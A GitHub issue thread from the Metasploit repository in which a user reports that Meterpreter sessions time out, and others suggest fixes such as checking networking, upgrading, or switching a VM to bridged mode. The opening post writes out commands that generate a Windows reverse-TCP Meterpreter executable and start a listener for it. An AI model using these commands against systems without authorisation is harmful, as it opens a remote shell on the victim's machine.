### ISSUE TITLE
Error running command sysinfo: Rex::TimeoutError Operation timed out

### ISSUE THREAD

**Issue by masifpak** [rapid7/metasploit-framework#10983]
Hi all,

I am running exploit as following.
```
use  windows/meterpreter/reverse_tcp
Set lhost 192.168.1.187
generate   -t exe  -f  filename.exe
use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp
set lhost  kali-IP
set lport  4444
exploit
```
When I am given meterpreter session, I am able to run just one or two commands in first 3 seconds. After that I receive error on each command. How can I fix this issue.

**Comment by busterb** [comment]
You haven't said anything about what OS you're targeting on the remote side, how you're running the executable, AV software, etc. Also, it is unclear if 'kali-IP' is the same as 192.168.1.187, but if it is not, you have packet routing issues.

For general usage / support, try https://metasploit.com since this repo is for bug reports and feature requests.

**Comment by saumyabhatnagar1** [comment]
I am too having the same problem.
I am targetting a windows system

**Comment by alfaridzf100** [comment]
try to upgrade metasploit

> sudo apt-get upgrade metasploit-framework

**Comment by C4ss707** [comment]
If you are doing this on a VM make sure you change NAT to bridged in the network settings of your machine.
Worked for me at least
